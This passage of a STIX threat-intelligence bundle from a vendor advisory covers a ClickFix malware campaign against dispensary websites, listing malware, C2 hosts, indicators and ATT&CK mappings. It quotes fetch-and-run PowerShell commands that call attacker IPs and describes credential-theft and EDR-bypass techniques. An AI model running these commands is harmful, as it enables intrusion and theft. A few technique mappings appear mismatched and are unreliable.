        "relationship--61507db7-5a85-463b-9f03-2121b1e0a775",
        "relationship--77882769-bd05-4642-8181-8754bada72c8",
        "attack-pattern--bb9f027a-3ae9-4429-b16c-51cc48fc4197",
        "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
        "threat-actor--9537c8dd-8a4f-470c-a27b-7c86fca335b1",
        "relationship--e2f8ee09-7395-4e81-b098-135915184564",
        "indicator--e14416aa-6d76-4d6c-a891-766c882e8dc9",
        "indicator--6799e6b4-56a0-4204-874d-0220b0e85773",
        "process--53c85b31-f98a-45c6-b662-18fb9f681f21",
        "relationship--12606fed-779a-468a-8ab6-9a50fa1ac4c0",
        "relationship--46970cf2-09ca-4f37-b814-38434419b9f0",
        "indicator--f04509f2-c681-4ab6-b087-2602d8d0f33a",
        "relationship--ffea69f3-6d86-4e1b-a388-176e8a92b460",
        "relationship--b2a8ab01-10d1-4322-850a-0e6177314f2b",
        "indicator--258ea0ac-c6bd-4b42-8c89-f77242a0ee54",
        "relationship--7bb15a7f-6147-4b51-bcfc-193c32a546b3",
        "indicator--731d1857-f08e-4a24-b03e-fa78985fbbd7",
        "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
        "note--77653f1f-5659-4737-9088-663c4f944ab2",
        "threat-actor--380ce122-ec58-4108-a29a-94f24790b4bd",
        "relationship--890c4688-4018-4b9b-853c-eed71012e0bf",
        "relationship--7f0d619c-2eb4-481c-b7b0-ab3eb297f84e",
        "attack-pattern--8614fc05-7c49-47c3-9248-4c1d60c5e1be",
        "indicator--9f4605b2-917e-4844-b228-26c8e2659e4c",
        "relationship--92eac3c0-2eee-4ad1-a21b-10e32e608433",
        "relationship--d7ce0ab6-8286-462d-ab7b-8d92e4e5cc9d",
        "process--cf2b9712-adf4-4636-82c1-fd62dc53f765",
        "indicator--ebb46384-b61d-4ae1-8e2a-aafa6ff724b4",
        "attack-pattern--e88d64db-0290-4273-82a2-2a7071da66b5"
      ],
      "external_references": [
        {
          "source_name": "SecureLeaf",
          "description": "SL-ADV-007 Unified Advisory \u2014 Final",
          "url": "https://secureleaf.dispensight.com/advisories/SL-ADV-007"
        },
        {
          "source_name": "AlienVault OTX",
          "description": "JS Clickfix + Windows-specific multi-stage payload",
          "url": "https://otx.alienvault.com"
        }
      ],
      "labels": [
        "SL-ADV-007",
        "unified",
        "final",
        "dispensight",
        "secureleaf",
        "tds",
        "clickfix",
        "shadow-dom",
        "infostealer",
        "donutloader",
        "rozena",
        "as202412",
        "affiliate-platform",
        "march-2026",
        "may-2026",
        "cannabis-retail",
        "process-scos"
      ]
    },
    {
      "type": "identity",
      "spec_version": "2.1",
      "id": "identity--a06f63fe-1ba3-4a52-87ac-5c98f7ea3513",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "SecureLeaf",
      "identity_class": "organization",
      "description": "SecureLeaf \u2013 Cybersecurity & Fraud Detection Division of Dispensight",
      "sectors": [
        "technology",
        "cannabis-retail-security"
      ],
      "contact_information": "SecureLeaf Threat Intelligence | SL-ADV-007"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--46350024-fe9a-4ef8-a891-d79b7cb9044c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "OmegaTech Circus",
      "description": "ClickFix/Shadow DOM threat actor operating TDS infrastructure under AS202412 (OmegaTech). Delivers fake Cloudflare CAPTCHA lures leading to PowerShell-based infostealer chains (TR/Rozena.Gen / DonutLoader). Targets cannabis retail and dispensary web properties. Operates dual TDS C2 domains: ntdnewtds.shop (primary) and dnsnewtds.shop (fallback).",
      "threat_actor_types": [
        "criminal",
        "financially-motivated"
      ],
      "sophistication": "advanced",
      "resource_level": "individual",
      "primary_motivation": "financial-gain",
      "aliases": [
        "OmegaTech",
        "AS202412 TDS Actor"
      ],
      "labels": [
        "clickfix",
        "tds",
        "infostealer",
        "crypto-stealer"
      ]
    },
    {
      "type": "campaign",
      "spec_version": "2.1",
      "id": "campaign--1f3b8c05-7a58-45b1-b228-6fc7c5ab9c33",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "SL-ADV-007: OmegaTech ClickFix/Shadow DOM Campaign",
      "description": "Multi-stage attack campaign targeting cannabis dispensary websites. WordPress sites compromised via Shadow DOM injection. ClickFix fake Cloudflare CAPTCHA delivers PowerShell clipboard payload. Full chain: JS TDS Loader \u2192 PowerShell Stage-1/2 \u2192 TR/Rozena.Gen \u2192 DonutLoader C2 \u2192 Browser/crypto credential theft. Parallel chain via WScript payload.js \u2192 python312x64 bundle \u2192 Protected.py infostealer with direct-syscall EDR bypass.",
      "first_seen": "2026-01-01T00:00:00Z",
      "last_seen": "2026-05-18T00:00:00.000Z",
      "labels": [
        "clickfix",
        "shadow-dom",
        "tds",
        "infostealer",
        "dispensary"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--499d1c28-f49d-4ef5-83f7-9463c0122acd",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "TDS Stage-1 JS Injector (tji-mu-js)",
      "description": "Obfuscator.io premium JavaScript TDS loader injected into victim WordPress pages via Shadow DOM. Uses RC4+Base64 cipher with 39,565-entry encoded string array and rotation offset 661,915. Guards execution with window.__performance_optimizer_v6 deduplication flag. Fires synchronous XHR GET to ntdnewtds.shop/jsrepo?rnd=<random> (fallback: dnsnewtds.shop). On HTTP 200: creates <script> element, sets .text = responseText, appends to document.head. Contains 4 anti-debug layers, persistent setInterval debugger trap (4000ms), and Function.constructor sandbox escape probe.",
      "malware_types": [
        "trojan",
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "tds",
        "clickfix",
        "stage1",
        "obfuscator.io",
        "rc4",
        "javascript-injector"
      ],
      "architecture_execution_envs": [
        "browser"
      ],
      "implementation_languages": [
        "javascript"
      ],
      "capabilities": [
        "anti-debugging",
        "anti-vm",
        "remote-code-execution",
        "obfuscated-payloads"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--7617f6ad-f4a2-43b9-9bb3-afb451fd6c8d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "ClickFix PowerShell Dropper",
      "description": "PowerShell payload placed in clipboard via clipboard.writeText(). User executes via Win+R \u2192 paste \u2192 OK. Stage 1: iex(irm('178.16.52.232')) \u2014 downloads and executes second PS script. Stage 2: IWR http://158.94.208.92 \u2192 IEX $checkResult.Content. Compiles tr0oowwq.dll (TR/Rozena.Gen) via csc.exe from TEMP. Injects compiled DLL into svchost.exe via WriteProcessMemory + CreateRemoteThread.",
      "malware_types": [
        "dropper",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "clickfix",
        "powershell",
        "rozena",
        "process-injection"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "powershell"
      ],
      "capabilities": [
        "remote-code-execution",
        "process-injection",
        "anti-vm",
        "data-exfiltration",
        "credential-theft",
        "crypto-wallet-theft"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--2dcc8a11-30b5-446f-974e-1fa323235f77",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "TR/Rozena.Gen",
      "description": "DLL payload compiled at runtime by csc.exe from %TEMP%\\tr0oowwq.cmdline. Injected into svchost.exe. Connects to DonutLoader C2 at 158.94.208.104:80. Subsequently injects into chrome.exe. Steals: Chrome history/cookies, Firefox key4.db, Electrum wallet, Jaxx wallet. Performs WMI Win32_VideoController VM detection. Self-deletes via cmd.exe /C ping 1.0.0.1 & del svchost.exe.",
      "malware_types": [
        "infostealer",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "rozena",
        "donutloader",
        "infostealer",
        "crypto-stealer"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "capabilities": [
        "data-exfiltration",
        "credential-theft",
        "browser-data-theft",
        "crypto-wallet-theft",
        "anti-vm",
        "self-deletion",
        "process-injection"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--96eb45ab-eeab-4301-bc5d-8e46b03e29e3",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "payload.js WScript Dropper",
      "description": "JScript payload executed via WScript.exe. Performs COM queries (WBEM Locator, WMI, WSH Shell Object) and reads HKCU\\Control Panel\\International\\Geo Nation for geo-targeting. Executes rundll32.exe shell32.dll,ShellExec_RunDLL to launch encoded PowerShell. PowerShell: disables SSL validation, downloads python312x64.zip from filemail.com, extracts to AppData\\Roaming\\Templates\\python312x64\\, launches pythonw.exe Protected.py. Persistence via SyncAppvPublishingServer LOLBin (hidden PowerShell).",
      "malware_types": [
        "dropper"
      ],
      "is_family": false,
      "labels": [
        "wscript",
        "lolbin",
        "python-dropper",
        "geo-targeted"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "jscript",
        "powershell"
      ],
      "capabilities": [
        "remote-code-execution",
        "anti-vm",
        "obfuscated-payloads"
      ]
    },
    {
      "type": "malware",
      "spec_version": "2.1",
      "id": "malware--6d0e0b80-3486-4c90-bc0b-907b99bcddd7",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Protected.py Python Infostealer",
      "description": "Python payload (Protected.py) executed by pythonw.exe (3 instances: PIDs 1752, 3152, 5032). Loads PyCryptodome (AES, RSA, ECC, ChaCha20). Drops wc*.tmp PE files to %TEMP%, maps into memory, then deletes from disk (fileless execution). Uses direct NT syscalls (NtCreateFile, NtReadFile, NtWriteFile) to bypass EDR. DLL load proxy for ntdll.dll and cryptsp.dll from RWX memory. Custom stack switching for stack trace evasion. Injection target: wab.exe via NtMapViewOfSection + NtSetContextThread.",
      "malware_types": [
        "infostealer",
        "trojan"
      ],
      "is_family": false,
      "labels": [
        "python",
        "edr-bypass",
        "direct-syscalls",
        "fileless",
        "process-injection"
      ],
      "architecture_execution_envs": [
        "windows"
      ],
      "implementation_languages": [
        "python"
      ],
      "capabilities": [
        "data-exfiltration",
        "process-injection",
        "anti-debugging",
        "anti-vm",
        "obfuscated-payloads",
        "remote-code-execution"
      ]
    },
    {
      "type": "tool",
      "spec_version": "2.1",
      "id": "tool--fd187635-ac3e-4a34-9449-13b5e7f8ed17",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "DonutLoader",
      "description": "Shellcode-based in-memory loader. C2 at 158.94.208.104:80.",
      "tool_types": [
        "exploitation"
      ],
      "labels": [
        "donutloader",
        "shellcode-loader",
        "c2"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--039209b1-3f0c-438c-9dc4-67bd1a033944",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "ntdnewtds.shop \u2014 Primary TDS C2",
      "description": "Primary Traffic Distribution System endpoint. Serves remote JS payload via /jsrepo?rnd=<random>.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "ntdnewtds"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--54ed4647-5712-4647-bfd8-4e89b7d8498b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "dnsnewtds.shop \u2014 Fallback TDS C2",
      "description": "Fallback TDS endpoint, queried if ntdnewtds.shop fails.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "tds",
        "c2",
        "dnsnewtds",
        "fallback"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--4f656499-38fb-4fe4-af5d-b93b309d23db",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "178.16.52.232 \u2014 PowerShell Stage-1 Host",
      "description": "Hosts first-stage PowerShell payload retrieved by Invoke-RestMethod.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "powershell",
        "stage1",
        "iex",
        "irm"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--b4c4c5c4-7ff9-4379-a332-9281bf63c84f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "158.94.208.92 \u2014 PowerShell Stage-2 Host",
      "description": "Hosts second-stage PowerShell payload (IWR + IEX). Triggers csc.exe compilation of Rozena DLL.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "powershell",
        "stage2",
        "rozena",
        "csc"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--806df9e8-09bf-448a-9bb0-7f3adf608a11",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "158.94.208.104:80 \u2014 DonutLoader C2",
      "description": "DonutLoader command-and-control endpoint. Contacted by injected svchost.exe.",
      "infrastructure_types": [
        "command-and-control"
      ],
      "labels": [
        "donutloader",
        "c2",
        "post-injection"
      ]
    },
    {
      "type": "infrastructure",
      "spec_version": "2.1",
      "id": "infrastructure--96ccc860-dc19-451c-8541-79141d9b2131",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "3004.filemail.com \u2014 Python Payload Host",
      "description": "Hosts python312x64.zip containing pythonw.exe + Protected.py infostealer bundle.",
      "infrastructure_types": [
        "staging"
      ],
      "labels": [
        "filemail",
        "python",
        "zip-dropper",
        "staging"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--be5d21db-c597-4746-bf93-f0f207cb2fb1",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Domain: ntdnewtds.shop",
      "description": "Primary TDS C2 domain. Serves obfuscated JS payload at /jsrepo endpoint.",
      "indicator_types": [
        "malicious-activity",
        "compromised"
      ],
      "pattern": "[domain-name:value = 'ntdnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "primary"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--31d4b9ba-b028-4cce-881e-b0e7de7985e2",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Domain: dnsnewtds.shop",
      "description": "Fallback TDS C2 domain.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[domain-name:value = 'dnsnewtds.shop']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "tds",
        "c2",
        "fallback"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4c4a571f-ea83-4dd4-9dc7-32b54aad4077",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "IP: 178.16.52.232 \u2014 PS Stage-1",
      "description": "PowerShell Stage-1 host. Invoked via iex(irm(('178.'+'16')+(...)+'232')).",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '178.16.52.232']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "powershell",
        "stage1",
        "c2"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e0d5f982-3635-4811-a7c1-6f46455efe27",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "IP: 158.94.208.92 \u2014 PS Stage-2",
      "description": "PowerShell Stage-2 host. IWR + IEX triggers csc.exe Rozena compilation.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '158.94.208.92']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "powershell",
        "stage2",
        "rozena"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--91538353-23f6-42ba-9b8e-a77b8c7ef1d6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "IP: 158.94.208.104:80 \u2014 DonutLoader C2",
      "description": "DonutLoader C2. Contacted by svchost.exe post-injection.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[ipv4-addr:value = '158.94.208.104']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "donutloader",
        "c2",
        "port-80"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--d2c06d08-5ab3-4100-b7e0-4eeeaea9258b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "URL Pattern: /jsrepo?rnd= endpoint",
      "description": "TDS payload delivery endpoint pattern. Cache-busted with Math.random() suffix.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[url:value MATCHES '^https?://(ntd|dns)newtds\\.shop/jsrepo\\?rnd=']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "tds",
        "payload-delivery",
        "jsrepo"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--c74a3775-b069-4570-8a17-270bb4519c77",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: Raw obfuscated JS payload (god-help-me.js)",
      "description": "Raw obfuscator.io premium Stage-1 TDS loader. 1,283,726 bytes. RC4+Base64 cipher, 39,565-entry string array, rotation offset 661,915.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = 'f29926ae72794dde60ae1d57d97c5781' OR file:hashes.'SHA-1' = 'f7836ce43c5f137fdd793d37c0ad3c17ab4ec9f0' OR file:hashes.'SHA-256' = 'b726e153e883e0bc6fba82c4ac6811d7e924b981778c122f34a57edd613b1937']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "stage1",
        "obfuscator.io",
        "tds-loader"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--258ea0ac-c6bd-4b42-8c89-f77242a0ee54",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: Prettified JS payload (stuff.js)",
      "description": "Prettified/partially-deobfuscated variant of Stage-1 loader. 844,866 bytes. Cipher intact; structural analysis confirmed identical behaviour.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:hashes.MD5 = 'ff1d1a915f7a4a1df4a16e0dd2990241' OR file:hashes.'SHA-1' = 'abc92bc7fcb91e4122ebe93c4ea0d35b0e5bbce5' OR file:hashes.'SHA-256' = 'ddc31ec7dbb142352e2b91847aac451f7891e107a2d0075a13b96a02cd043cff']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "stage1",
        "prettified",
        "analysis-artifact"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--185dea0e-c306-46a5-ab00-efb8b36106b7",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "DOM: script id=tji-mu-js + window.__performance_optimizer_v6",
      "description": "Injected script element carries id='tji-mu-js'. Deduplication guard: window.__performance_optimizer_v6 checked before execution.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[network-traffic:extensions.'http-request-ext'.request_header.'X-Custom' MATCHES 'tji-mu-js']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "dom-injection",
        "guard-flag",
        "script-id"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--79c3034f-50e5-4ad7-884d-80dfafe59bdf",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: %TEMP%\\tr0oowwq.dll (TR/Rozena.Gen)",
      "description": "Rozena DLL compiled at runtime by csc.exe from tr0oowwq.cmdline in TEMP directory.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'tr0oowwq.dll' AND file:parent_directory_ref.path MATCHES '(?i)temp']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "rozena",
        "csc-compiled",
        "temp-dll"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--acdfce08-d674-4e7f-b3ba-7d2c702e66da",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: python312x64.zip + Protected.py",
      "description": "Python infostealer bundle. Extracted to AppData\\Roaming\\Templates\\python312x64\\.",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name = 'python312x64.zip' OR file:name = 'Protected.py']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "python-dropper",
        "protected.py",
        "infostealer"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--41f15b3b-22f9-4c4f-bef1-68b1c60acc3d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "File: wc*.tmp PE files in %TEMP%",
      "description": "Temporary PE files dropped by Protected.py, loaded into memory then deleted (fileless execution).",
      "indicator_types": [
        "malicious-activity"
      ],
      "pattern": "[file:name MATCHES '^wc.*\\.tmp$' AND file:parent_directory_ref.path MATCHES '(?i)temp']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "fileless",
        "pe-dropper",
        "protected.py"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6aa035e5-44c0-490f-8bdc-82446b99d9a3",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Process: SyncAppvPublishingServer LOLBin persistence",
      "description": "payload.js uses SyncAppvPublishingServer LOLBin to launch hidden PowerShell for Protected.py persistence.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[process:command_line MATCHES '(?i)SyncAppvPublishingServer']",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "lolbin",
        "persistence",
        "hidden-powershell"
      ]
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e4dbccb9-8458-43c1-a1ce-58678d9007f8",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "Process: wab.exe injection target (3 instances)",
      "description": "Protected.py injects into wab.exe via NtMapViewOfSection + NtSetContextThread. PIDs 1752, 3152, 5032 observed.",
      "indicator_types": [
        "malicious-activity",
        "anomalous-activity"
      ],
      "pattern": "[process:name = 'wab.exe' AND process:is_hidden = true]",
      "pattern_type": "stix",
      "valid_from": "2026-05-18T00:00:00.000Z",
      "labels": [
        "process-injection",
        "wab.exe",
        "nt-syscalls",
        "edr-bypass"
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--7612c7bf-3153-4a0c-b6c7-b030634e93cb",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1059.001 \u2014 Command and Scripting Interpreter: PowerShell",
      "description": "PowerShell used throughout: stage-1 IRM/IEX download, stage-2 payload execution, Protected.py launcher.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/001",
          "external_id": "T1059.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--99f2ace8-7793-4317-b1db-7b16dc824413",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1059.005 \u2014 Command and Scripting Interpreter: Visual Basic / JScript",
      "description": "payload.js executed via WScript.exe as JScript dropper.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/005",
          "external_id": "T1059.005"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--57b7b160-ed4d-4490-bb90-78991009371f",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1059.007 \u2014 Command and Scripting Interpreter: JavaScript",
      "description": "Stage-1 TDS loader is obfuscated JavaScript injected into the victim's browser via a compromised WordPress page.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1059/007",
          "external_id": "T1059.007"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f313fb9c-74e6-49bb-80d9-02606d618988",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1566.002 \u2014 Phishing: Spearphishing Link",
      "description": "Victims lured to compromised dispensary websites hosting injected TDS JS.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1566/002",
          "external_id": "T1566.002"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b04983-fe4e-491f-9481-f738ad87890b",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1027 \u2014 Obfuscated Files or Information",
      "description": "Stage-1 JS uses obfuscator.io premium RC4+Base64 cipher with 39,565-entry encoded string array.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027",
          "external_id": "T1027"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--922f869e-8c22-42fb-ab24-ac3bef8d1d0c",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1027.010 \u2014 Obfuscated Files or Information: Command Obfuscation",
      "description": "PowerShell stage-1 string-splits the IP: ('178.'+'16')+('.52.'+'232'). payload.js launches PowerShell with a base64 -EncodedCommand.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1027/010",
          "external_id": "T1027.010"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5fdadf5e-da2b-4f42-9621-876da67b4672",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1055.001 \u2014 Process Injection: Dynamic-link Library Injection",
      "description": "TR/Rozena.Gen injected into svchost.exe and chrome.exe via WriteProcessMemory + CreateRemoteThread.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1055/001",
          "external_id": "T1055.001"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0b92f6a8-147e-4a48-ad1f-629aa22a00fa",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1055.013 \u2014 Process Injection: Process Doppelg\u00e4nging / NtMapViewOfSection",
      "description": "Protected.py injects into wab.exe via NtMapViewOfSection + NtSetContextThread (direct NT syscalls).",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1055/013",
          "external_id": "T1055.013"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bb9f027a-3ae9-4429-b16c-51cc48fc4197",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1106 \u2014 Native API",
      "description": "Protected.py uses direct NT syscalls (NtCreateFile, NtReadFile, NtWriteFile) to bypass EDR hooks.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1106",
          "external_id": "T1106"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--19f54e44-5a76-4319-a03f-600ed5c58fdd",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1218.011 \u2014 System Binary Proxy Execution: Rundll32",
      "description": "payload.js uses rundll32.exe shell32.dll,ShellExec_RunDLL to launch encoded PowerShell.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1218/011",
          "external_id": "T1218.011"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4ad400f6-3d74-41af-be79-d45383f0e37d",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
      "name": "T1218.004 \u2014 System Binary Proxy Execution: InstallUtil / SyncAppvPublishingServer",
      "description": "SyncAppvPublishingServer LOLBin used to launch hidden persistent PowerShell for Protected.py.",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "url": "https://attack.mitre.org/techniques/T1218/004",
          "external_id": "T1218.004"
        }
      ]
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--753a2633-e834-4ba8-a846-96dfd1bb7ed6",
      "created": "2026-05-18T00:00:00.000Z",
      "modified": "2026-05-18T00:00:00.000Z",
